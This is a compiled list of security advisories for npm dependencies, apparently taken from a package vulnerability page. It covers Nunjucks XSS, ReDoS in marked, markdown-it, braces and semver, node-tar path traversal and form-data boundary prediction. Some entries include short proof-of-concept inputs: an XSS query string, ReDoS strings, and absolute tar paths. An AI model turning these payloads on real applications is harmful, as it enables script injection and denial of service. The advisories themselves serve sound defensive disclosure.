All the vulnerabilities related to the version 1.0.0 of the package
Nunjucks autoescape bypass leads to cross site scripting
In Nunjucks versions prior to version 3.2.4, it was possible to bypass the restrictions which are provided by the autoescape functionality. If there are two user-controlled parameters on the same line used in the views, it was possible to inject cross site scripting payloads using the backslash \ character.
If the user-controlled parameters were used in the views similar to the following:
<script>
let testObject = { lang: '{{ lang }}', place: '{{ place }}' };
</script>
It is possible to inject XSS payload using the below parameters:
https://<application-url>/?lang=jp\&place=};alert(document.domain)//
The issue was patched in version 3.2.4.
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.
Regular Expression Denial of Service in braces
Versions of braces prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.
Upgrade to version 2.3.1 or higher.
Uncontrolled resource consumption in braces
The NPM package braces fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js, if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.
Improper Certificate Validation in node-sass
Certificate validation in node-sass 2.0.0 to 6.0.1 is disabled when requesting binaries even if the user is not specifying an alternative download path.
Uncontrolled Resource Consumption in trim-newlines
@rkesters/gnuplot is an easy to use node module to draw charts using gnuplot and ps2pdf. The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
Server-Side Request Forgery in Request
The request package through 2.88.2 for Node.js and the @cypress/request package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: The request package is no longer supported by the maintainer.
form-data uses unsafe random function in form-data for choosing boundary
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347
An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose)
PoC here: https://github.com/benweissmann/CVE-2025-7783-poc
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
For an application to be vulnerable, it must:
form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
tough-cookie Prototype Pollution vulnerability
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.
Arbitrary File Creation/Overwrite due to insufficient absolute path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the preservePaths flag is not set to true. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example /home/user/.bashrc would turn into home/user/.bashrc.
This logic was insufficient when file paths contained repeated path roots such as ////home/user/.bashrc. node-tar would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. ///home/user/.bashrc) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite.
3.2.2 || 4.4.14 || 5.0.6 || 6.1.1
NOTE: an adjacent issue CVE-2021-32803 affects this release level. Please ensure you update to the latest patch levels that address CVE-2021-32803 as well if this adjacent issue affects your node-tar use case.
Users may work around this vulnerability without upgrading by creating a custom onentry method which sanitizes the entry.path or a filter method which removes entries with absolute paths.
const path = require('path')
const tar = require('tar')
tar.x({
file: 'archive.tgz',
// either add this function...
onentry: (entry) => {
if (path.isAbsolute(entry.path)) {
entry.path = sanitizeAbsolutePathSomehow(entry.path)
entry.absolute = path.resolve(entry.path)
}
},
// or this one
filter: (file, entry) => {
if (path.isAbsolute(entry.path)) {
return false
} else {
return true
}
}
})
Users are encouraged to upgrade to the latest patch versions, rather than attempt to sanitize tar input themselves.
Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain .. path portions, and resolving the sanitized paths against the extraction target directory.
This logic was insufficient on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target, such as C:some\path. If the drive letter does not match the extraction target, for example D:\extraction\dir, then the result of path.resolve(extractionDirectory, entryPath) would resolve against the current working directory on the C: drive, rather than the extraction target directory.
Additionally, a .. portion of the path could occur immediately after the drive letter, such as C:../foo, and was not properly sanitized by the logic that checked for .. within the normalized and split portions of the path.
This only affects users of node-tar on Windows systems.
4.4.18 || 5.0.10 || 6.1.9
There is no reasonable way to work around this issue without performing the same path normalization procedures that node-tar now does.
Users are encouraged to upgrade to the latest patched versions of node-tar, rather than attempt to sanitize paths themselves.
The fixed versions strip path roots from all paths prior to being resolved against the extraction target folder, even if such paths are not "absolute".
Additionally, a path starting with a drive letter and then two dots, like c:../, would bypass the check for .. path portions. This is checked properly in the patched versions.
Finally, a defense in depth check is added, such that if the entry.absolute is outside of the extraction taret, and we are not in preservePaths:true mode, a warning is raised on that entry, and it is skipped. Currently, it is believed that this check is redundant, but it did catch some oversights in development.
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis today on npm's node-tar package I came across the folder creation process, Basicly if you provide node-tar with a path like this ./a/b/c/foo.txt it would create every folder and sub-folder here a, b and c until it reaches the last folder to create foo.txt, In-this case I noticed that there's no validation at all on the amount of folders being created, that said we're actually able to CPU and memory consume the system running node-tar and even crash the nodejs client within few seconds of running it using a path with too many sub-folders inside
You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it, you should get the same behavior as the video
Here's a video show-casing the exploit:
Denial of service by crashing the nodejs client when attempting to parse a tar archive, make it run out of heap memory and consuming server CPU and memory resources
This report was originally reported to GitHub bug bounty program, they asked me to report it to you a month ago
semver vulnerable to Regular Expression Denial of Service
Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
Regular expression denial of service in scss-tokenizer
All versions of the package scss-tokenizer prior to 0.4.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via the loadAnnotation() function, due to the usage of insecure regex.
Regular Expression Denial of Service (ReDoS) in cross-spawn
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.
Uncontrolled Resource Consumption in markdown-it
Special patterns with length > 50K chars can slow down parser significantly.
const md = require('markdown-it')();
md.render(`x ${' '.repeat(150000)} x \nx`);
Upgrade to v12.3.2+
No.
Fix + test sample: https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101
Regular Expression Denial of Service (ReDoS)
The is-svg package 2.1.0 through 4.2.1 for Node.js uses a regular expression that is vulnerable to Regular Expression Denial of Service (ReDoS). If an attacker provides a malicious string, is-svg will get stuck processing the input.
ReDOS in IS-SVG
A vulnerability was discovered in IS-SVG version 4.3.1 and below where a Regular Expression Denial of Service (ReDOS) occurs if the application is provided and checks a crafted invalid SVG string.
Path Traversal in decompress
Versions of decompress prior to 4.2.1 are vulnerable to Arbitrary File Write. The package fails to prevent extraction of files with relative paths, allowing attackers to write to any folder in the system by including filenames containing../.
Upgrade to version 4.2.1 or later.
Regular expression denial of service in url-regex
all versions of url-regex are vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.
semver-regex Regular Expression Denial of Service (ReDOS)
npm semver-regex is vulnerable to Inefficient Regular Expression Complexity
Regular expression denial of service in semver-regex
An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test() method
Got allows a redirect to a UNIX socket
The got package before 11.8.5 and 12.1.0 for Node.js allows a redirect to a UNIX socket.
sassdoc-extras vulnerable to prototype pollution
A Prototype Pollution vulnerability in the byGroupAndType function of sassdoc-extras v2.5.1 and before allows attackers to inject properties on Object.prototype via supplying a crafted payload, causing denial of service (DoS) as the minimum consequence.
Inefficient Regular Expression Complexity in marked
What kind of vulnerability is it?
Denial of service.
The regular expression inline.reflinkSearch may cause catastrophic backtracking against some strings.
PoC is the following.
import * as marked from 'marked';
console.log(marked.parse(`[x]: x
\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](`));
Who is impacted?
Anyone who runs untrusted markdown through marked and does not use a worker with a time limit.
Has the problem been patched?
Yes
What versions should users upgrade to?
4.0.10
Is there a way for users to fix or remediate the vulnerability without upgrading?
Do not run untrusted markdown through marked or run marked on a worker thread and set a reasonable time limit to prevent draining resources.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory:
Regular Expression Denial of Service in marked
Affected versions of marked are vulnerable to Regular Expression Denial of Service (ReDoS). The _label subrule may significantly degrade parsing performance of malformed input.
Upgrade to version 0.7.0 or later.
Inefficient Regular Expression Complexity in marked
What kind of vulnerability is it?
Denial of service.
The regular expression block.def may cause catastrophic backtracking against some strings.
PoC is the following.
import * as marked from "marked";
marked.parse(`[x]:${' '.repeat(1500)}x ${' '.repeat(1500)} x`);
Who is impacted?
Anyone who runs untrusted markdown through marked and does not use a worker with a time limit.
Has the problem been patched?
Yes
What versions should users upgrade to?
4.0.10
Is there a way for users to fix or remediate the vulnerability without upgrading?
Do not run untrusted markdown through marked or run marked on a worker thread and set a reasonable time limit to prevent draining resources.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory:
Command Injection in lodash
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Regular Expression Denial of Service in string package
Affected versions of string are vulnerable to regular expression denial of service when specifically crafted untrusted user input is passed into the underscore or unescapeHTML methods.
There is currently no direct patch for this vulnerability.
Currently, the best solution is to avoid passing user input to the underscore and unescapeHTML methods.
Alternatively, a user provided patch is available in Pull Request #217, however this patch has not been tested, nor has it been merged by the package author.